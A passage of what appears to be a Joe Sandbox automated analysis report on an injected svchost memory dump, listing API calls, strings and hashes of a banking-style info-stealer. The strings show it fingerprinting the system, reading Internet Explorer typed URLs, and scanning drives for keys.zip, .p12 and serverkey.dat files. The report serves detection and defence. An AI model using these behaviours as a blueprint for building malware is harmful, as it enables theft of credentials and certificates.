                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C957EC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 02C957F9
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Administrator: ,00000010,00000000,00000000), ref: 02C95809
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 02C9581A
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02C95820
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02C95843
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C95875
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02C95884
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02C95895
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02C958A8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C958BC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C958C8
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02CD5B88,00000002,00000000,00000000), ref: 02C958D8
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C958E6
                                                                                                                                                                                                                • Part of subcall function 02C94900: RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\TypedURLs,00000000,00020119,?), ref: 02C94925
                                                                                                                                                                                                                • Part of subcall function 02C94900: _snprintf.MSVCRT ref: 02C9494D
                                                                                                                                                                                                                • Part of subcall function 02C94900: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,74DF3490), ref: 02C94987
                                                                                                                                                                                                                • Part of subcall function 02C94900: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C949A9
                                                                                                                                                                                                                • Part of subcall function 02C94900: LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02C949B5
                                                                                                                                                                                                                • Part of subcall function 02C94900: WriteFile.KERNEL32(00000000,IE history:,0000000C,02C958F1,00000000), ref: 02C949C9
                                                                                                                                                                                                                • Part of subcall function 02C94900: UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02C949D7
                                                                                                                                                                                                                • Part of subcall function 02C94900: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C949EB
                                                                                                                                                                                                                • Part of subcall function 02C94900: LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02C949F7
                                                                                                                                                                                                                • Part of subcall function 02C94900: WriteFile.KERNEL32(00000000,02CD5C1C,00000001,00000000,00000000), ref: 02C94A0B
                                                                                                                                                                                                                • Part of subcall function 02C94900: UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02C94A19
                                                                                                                                                                                                                • Part of subcall function 02C94180: GetProcessHeap.KERNEL32(00000008,00000C10,00000000,00000000,74DF3490), ref: 02C9419D
                                                                                                                                                                                                                • Part of subcall function 02C94180: HeapAlloc.KERNEL32(00000000), ref: 02C941A0
                                                                                                                                                                                                                • Part of subcall function 02C94180: memset.MSVCRT ref: 02C941B4
                                                                                                                                                                                                                • Part of subcall function 02C94180: GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02C94224
                                                                                                                                                                                                                • Part of subcall function 02C94180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C94232
                                                                                                                                                                                                                • Part of subcall function 02C94180: HeapValidate.KERNEL32(00000000), ref: 02C94235
                                                                                                                                                                                                                • Part of subcall function 02C94180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C94242
                                                                                                                                                                                                                • Part of subcall function 02C94180: HeapFree.KERNEL32(00000000), ref: 02C94245
                                                                                                                                                                                                                • Part of subcall function 02C94180: GetProcessHeap.KERNEL32(00000008,00000BED), ref: 02C9425D
                                                                                                                                                                                                                • Part of subcall function 02C94180: HeapAlloc.KERNEL32(00000000), ref: 02C94260
                                                                                                                                                                                                                • Part of subcall function 02C94180: memset.MSVCRT ref: 02C94270
                                                                                                                                                                                                                • Part of subcall function 02C94180: GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02C9428A
                                                                                                                                                                                                                • Part of subcall function 02C94180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C94297
                                                                                                                                                                                                                • Part of subcall function 02C94180: HeapValidate.KERNEL32(00000000), ref: 02C9429A
                                                                                                                                                                                                                • Part of subcall function 02C94180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C942AB
                                                                                                                                                                                                                • Part of subcall function 02C94180: HeapFree.KERNEL32(00000000), ref: 02C942AE
                                                                                                                                                                                                                • Part of subcall function 02C944D0: memset.MSVCRT ref: 02C94503
                                                                                                                                                                                                                • Part of subcall function 02C944D0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02C9450E
                                                                                                                                                                                                                • Part of subcall function 02C944D0: Process32First.KERNEL32 ref: 02C94531
                                                                                                                                                                                                                • Part of subcall function 02C944D0: GetHandleInformation.KERNEL32(00000000,?), ref: 02C9454D
                                                                                                                                                                                                                • Part of subcall function 02C944D0: CloseHandle.KERNEL32(00000000), ref: 02C94567
                                                                                                                                                                                                                • Part of subcall function 02C94710: NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,00000000,00000000,00000000,00000000,74DF3490,?,?,?,?,02C95903,00000000), ref: 02C9475A
                                                                                                                                                                                                                • Part of subcall function 02C94710: GetProcessHeap.KERNEL32(00000008,00000014,?,?,?,?,02C95903,00000000,00000000,00000000), ref: 02C947A5
                                                                                                                                                                                                                • Part of subcall function 02C94710: HeapAlloc.KERNEL32(00000000,?,?,?,?,02C95903,00000000,00000000,00000000), ref: 02C947AC
                                                                                                                                                                                                                • Part of subcall function 02C94710: memset.MSVCRT ref: 02C947BF
                                                                                                                                                                                                                • Part of subcall function 02C94710: _snprintf.MSVCRT ref: 02C9480A
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02C95913
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02C95924
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$LockPointerUnlockWrite$Heap$Process$memset$HandleInformationSecuritySystem_snprintf$AllocDescriptorFreeUser$AdminCloseCreateFormatMetricsNameQueryTableTimeValidate$CapsConvertDateDefaultDeviceDirectoryDisplayEnvironmentFirstInfoLangLocalModuleNamedOpenProcess32SaclSnapshotStringToolhelp32ValueVariableWindowsZone
                                                                                                                                                                                                              • String ID: %c%d:%02d$%dx%d@%d$4.1.2$HH:mm:ss$PROCESSOR_IDENTIFIER$XXX$dd:MMM:yyyy$false$true${Administrator: ${BotVer: ${Date: ${GMT: ${Language: ${Local time: ${Process: ${Processor: ${Screen: ${Uptime: ${Username: ${Windows directory:
                                                                                                                                                                                                              • API String ID: 2738427392-2715564829
                                                                                                                                                                                                              • Opcode ID: eaa4d8c934d7ff704af079c11953c2618e2bf4a1931c3a0809f0e1d562bb8639
                                                                                                                                                                                                              • Instruction ID: fff80d1c054b1f761ff6bef5664b7b5c0dc3e61294ef79a5d4056f4386b367b8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: eaa4d8c934d7ff704af079c11953c2618e2bf4a1931c3a0809f0e1d562bb8639
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2BA20E70A81318BEFB249B94CC4AFEE7B78EF45B45F604548F201BA1C0D7F46A458B69
                                                                                                                                                                                                              Function 02C9D300 Relevance: 101.9, APIs: 55, Strings: 3, Instructions: 429windowsynchronizationmemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 02C9D35F
                                                                                                                                                                                                              • SetWindowLongA.USER32(?,000000F0,00000000), ref: 02C9D36A
                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02C9D37D
                                                                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 02C9D392
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000EB), ref: 02C9D3A1
                                                                                                                                                                                                              • SetWindowTextA.USER32(?,-00000008), ref: 02C9D3AD
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 02C9D3BC
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02C9D3C7
                                                                                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02C9D3DA
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 02C9D418
                                                                                                                                                                                                              • GetClassLongA.USER32(00000000,000000E6), ref: 02C9D428
                                                                                                                                                                                                              • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 02C9D437
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 02C9D44F
                                                                                                                                                                                                              • GetObjectA.GDI32(00000000,0000003C,?), ref: 02C9D459
                                                                                                                                                                                                              • CreateFontIndirectA.GDI32 ref: 02C9D46F
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000030,00000000,00000000), ref: 02C9D47F
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000005), ref: 02C9D4B7
                                                                                                                                                                                                              • GetWindow.USER32(00000000), ref: 02C9D4BA
                                                                                                                                                                                                              • GetWindowInfo.USER32(00000000,?), ref: 02C9D4CE
                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 02C9D533
                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,?,?,00000116,?,00000200), ref: 02C9D55D
                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 02C9D569
                                                                                                                                                                                                              • MoveWindow.USER32(?,00000009,00000014,000000FC,00000014,00000001), ref: 02C9D585
                                                                                                                                                                                                              • CreateWindowExA.USER32(00000000,static,00000000,50000003,?,0000000A,00000023,00000027,?,00000000,00000000,00000000), ref: 02C9D5AA
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000F4,?), ref: 02C9D5BC
                                                                                                                                                                                                              • GetClassLongA.USER32(00000000,000000E6), ref: 02C9D5C5
                                                                                                                                                                                                              • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 02C9D5D4
                                                                                                                                                                                                              • GetWindowTextLengthA.USER32(00000000), ref: 02C9D5DB
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,00000008,0000000C), ref: 02C9D5EF
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000EB,00000000), ref: 02C9D613
                                                                                                                                                                                                              • SendMessageA.USER32(00000000,0000007F,00000001,00000000), ref: 02C9D620
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 02C9D630
                                                                                                                                                                                                              • GetClassLongA.USER32(00000000,000000DE), ref: 02C9D64C
                                                                                                                                                                                                              • GetClassLongA.USER32(00000000,000000F2), ref: 02C9D655
                                                                                                                                                                                                              • LoadIconA.USER32(00000000,00007F00), ref: 02C9D661
                                                                                                                                                                                                              • SendMessageA.USER32(00000000,00000172,00000001,00000000), ref: 02C9D67B
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 02C9D6A4
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02C9D6B3
                                                                                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02C9D6C6
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000003), ref: 02C9D6E9
                                                                                                                                                                                                              • IsIconic.USER32(?), ref: 02C9D707
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000001), ref: 02C9D714
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C9D723
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02C9D73B
                                                                                                                                                                                                                • Part of subcall function 02C9D2B0: GetWindowThreadProcessId.USER32(?,00000000), ref: 02C9D2BC
                                                                                                                                                                                                                • Part of subcall function 02C9D2B0: GetCurrentThreadId.KERNEL32 ref: 02C9D2C4
                                                                                                                                                                                                                • Part of subcall function 02C9D2B0: AttachThreadInput.USER32(00000000,00000000,00000001), ref: 02C9D2D0
                                                                                                                                                                                                                • Part of subcall function 02C9D2B0: SendMessageA.USER32(?,0000000D,?,?), ref: 02C9D2E1
                                                                                                                                                                                                                • Part of subcall function 02C9D2B0: AttachThreadInput.USER32(00000000,00000000,00000000), ref: 02C9D2ED
                                                                                                                                                                                                              • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 02C9D748
                                                                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 02C9D7B7
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000), ref: 02C9D7BE
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C9D7CE
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02C9D7E8
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000000), ref: 02C9D7FD
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000EB), ref: 02C9D80C
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 02C9D818
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02C9D827
                                                                                                                                                                                                              • DestroyWindow.USER32(00000000), ref: 02C9D82E
                                                                                                                                                                                                              • EndDialog.USER32(?,00000000), ref: 02C9D843
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Long$ClassMessage$SendThread$ItemObject$AttachCreateHeapInputMutexProcessRectReleaseSingleTextWait$AllocClientCurrentDeleteDestroyDialogFontFreeIconIconicIndirectInfoLengthLoadMovePostShow
                                                                                                                                                                                                              • String ID: '$<$static
                                                                                                                                                                                                              • API String ID: 2592195760-1233416523
                                                                                                                                                                                                              • Opcode ID: 141d5bce45e06576435550662a876ef1544af681d6828bc08d25e788ac8baa24
                                                                                                                                                                                                              • Instruction ID: 8c93f029a44e60b995870a3ecc6df7240099b16c394cb7263cc0d801686daeb3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 141d5bce45e06576435550662a876ef1544af681d6828bc08d25e788ac8baa24
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71E1AD71986301ABD7209F68EC88F6A37A8FB88762F504F08F556E72C0D774A551CB62
                                                                                                                                                                                                              Function 02C93A20 Relevance: 61.8, APIs: 22, Strings: 13, Instructions: 514threadmemorynativeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02C93ACA
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004,?), ref: 02C93B33
                                                                                                                                                                                                              • SymSetOptions.DBGHELP(00000006), ref: 02C93B48
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000001), ref: 02C93B58
                                                                                                                                                                                                              • SymInitialize.DBGHELP(00000000), ref: 02C93B5B
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000), ref: 02C93B9A
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,main,00000000,?), ref: 02C93C27
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02C93C47
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 02C93CD4
                                                                                                                                                                                                              • ZwQueryInformationThread.NTDLL(00000000), ref: 02C93CDB
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000), ref: 02C93D20
                                                                                                                                                                                                                • Part of subcall function 02CB5460: VirtualQuery.KERNEL32(02CB5460,?,0000001C,?,?,?,02C93BC8), ref: 02CB5488
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • main, xrefs: 02C93BEE
                                                                                                                                                                                                              • csm, xrefs: 02C93A45
                                                                                                                                                                                                              • ExceptionCode = 0x%08XLast error: 0x%08XContext:Eip = 0x%08X Eax = 0x%08X Ebx = 0x%08XEcx = 0x%08X Edx = 0x%08X Ebp = 0x%08XEsp = 0x%08X Esi = 0x%08X Edi = 0x%08XEFlags = 0x%08XMain module:%s 0x%08X-0x%08X, xrefs: 02C93C3E
                                                                                                                                                                                                              • CallStack:, xrefs: 02C93D58
                                                                                                                                                                                                              • HH;mm;ss, xrefs: 02C93EB2
                                                                                                                                                                                                              • debug_%s_%s.log, xrefs: 02C93ED4
                                                                                                                                                                                                              • scr.bmp, xrefs: 02C93FF8
                                                                                                                                                                                                              • ExceptionAddress = , xrefs: 02C93B68
                                                                                                                                                                                                              • Self exception = TRUE, xrefs: 02C93C8D
                                                                                                                                                                                                              • DEBUG, xrefs: 02C9404D
                                                                                                                                                                                                              • sysinfo.log, xrefs: 02C93F78
                                                                                                                                                                                                              • ThreadStart = , xrefs: 02C93CF8
                                                                                                                                                                                                              • dd;MMM;yyyy, xrefs: 02C93E8B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Current$ProcessQueryVirtual$Thread$AllocErrorInformationInitializeLastOptions_snprintf
                                                                                                                                                                                                              • String ID: CallStack:$ExceptionCode = 0x%08XLast error: 0x%08XContext:Eip = 0x%08X Eax = 0x%08X Ebx = 0x%08XEcx = 0x%08X Edx = 0x%08X Ebp = 0x%08XEsp = 0x%08X Esi = 0x%08X Edi = 0x%08XEFlags = 0x%08XMain module:%s 0x%08X-0x%08X$Self exception = TRUE$ThreadStart = $DEBUG$ExceptionAddress = $HH;mm;ss$csm$dd;MMM;yyyy$debug_%s_%s.log$main$scr.bmp$sysinfo.log
                                                                                                                                                                                                              • API String ID: 2913300210-1369666974
                                                                                                                                                                                                              • Opcode ID: f851e6f1426ca44927172484e4f3673d5ef89c4fc207d187d1b0551eb7956579
                                                                                                                                                                                                              • Instruction ID: 0c75ef8dea790192546afbbf96bae68aaff976e539c4cb7524f9b0ed62be832e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f851e6f1426ca44927172484e4f3673d5ef89c4fc207d187d1b0551eb7956579
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A12F671A406459FDF15CF68C898BAABBF6FF88344F548598E84ADB340D731AA45CF80
                                                                                                                                                                                                              Function 02CB2BB0 Relevance: 61.6, APIs: 27, Strings: 8, Instructions: 379COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CB2BCE
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CB2BE8
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02CB2C12
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C4505), ref: 02CB2C37
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02CB2C77
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB2C81
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB2C89
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 02CB2C9A
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CB2CA1
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 02CB2CE4
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(00000000), ref: 02CB2D30
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C4505,00000000,00000000), ref: 02CB2D77
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$BackslashDirectoryErrorFileLastmemset$AdminAttributesCreateCurrentFolderMakeModuleNameSystemUser
                                                                                                                                                                                                              • String ID: A23C4505$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$\$\SIGN1\$client.zip$keys.zip$path_client.txt$path_keys.txt
                                                                                                                                                                                                              • API String ID: 1576442920-959091512
                                                                                                                                                                                                              • Opcode ID: 15fd4ea778da98cb8c6c7161a47777729a931d629eee771bbc7ca8c63e6b0ebb
                                                                                                                                                                                                              • Instruction ID: a859f42628d73007963dbc2169184b71b97ac0403e26981dbfce40cc47a9c51d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15fd4ea778da98cb8c6c7161a47777729a931d629eee771bbc7ca8c63e6b0ebb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00D157309452998FDB22CB34D858BEA7BE5EF85301F1486D4EC89D7241DB71DA88CB91
                                                                                                                                                                                                              Function 02CAD120 Relevance: 56.3, APIs: 24, Strings: 8, Instructions: 346fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CAD13F
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CAD161
                                                                                                                                                                                                              • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02CAD176
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 02CAD18F
                                                                                                                                                                                                              • GetDriveTypeA.KERNEL32(?), ref: 02CAD1D8
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 02CAD1EB
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 02CAD24D
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(?), ref: 02CAD563
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DriveErrorModememset$CurrentDirectoryFileFindFirstLogicalStringsType
                                                                                                                                                                                                              • String ID: *.00*$.txt$.zip$A23C41FB$asus$found.$keys$path
                                                                                                                                                                                                              • API String ID: 989413159-1536425903
                                                                                                                                                                                                              • Opcode ID: 2fbbe6799759e7ce6fcda4a63285627ac8a7951e56cd5c85c18fd2359053305c
                                                                                                                                                                                                              • Instruction ID: 294645e46b5c82d2d53d034a2af64dd35c0899791728ddf2364eae0e85431934
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2fbbe6799759e7ce6fcda4a63285627ac8a7951e56cd5c85c18fd2359053305c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9C191715093468FCB15CB349468BABBBE5AFC9349F448A5DF9CAC7240EB31D608CB91
                                                                                                                                                                                                              Function 02C91170 Relevance: 44.0, APIs: 21, Strings: 4, Instructions: 203memorythreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C9118E
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,74DEF570), ref: 02C911AD
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,java), ref: 02C911C5
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,.exe), ref: 02C911DB
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,.p12,00000000), ref: 02C911FF
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02C91221
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 02C9123E
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02C91245
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C91255
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02C91271
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CAB4B0,00000000,00000000,00000000), ref: 02C91285
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,serverkey.dat,00000000), ref: 02C912A4
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02C912D5
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 02C912F2
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02C912F9
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C91309
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02C91325
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CAEB30,00000000,00000000,00000000), ref: 02C91339
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB01A0,00000000,00000000,00000000), ref: 02C91376
                                                                                                                                                                                                                • Part of subcall function 02CAB410: PathAddBackslashA.SHLWAPI(a23c41af), ref: 02CAB437
                                                                                                                                                                                                                • Part of subcall function 02CAB410: PathFileExistsA.SHLWAPI(?), ref: 02CAB4A0
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02C9138E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02C9139F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharHeapMultiWide$CreateThreadmemset$AllocFileHandlePathProcess$BackslashCloseExistsInformationModuleName
                                                                                                                                                                                                              • String ID: .exe$.p12$java$serverkey.dat
                                                                                                                                                                                                              • API String ID: 183229269-3502489836
                                                                                                                                                                                                              • Opcode ID: 05ad4c67ee511aafc81b7b6f5c37b933caa5d4a974e908ec0d90e59d06eb96bc
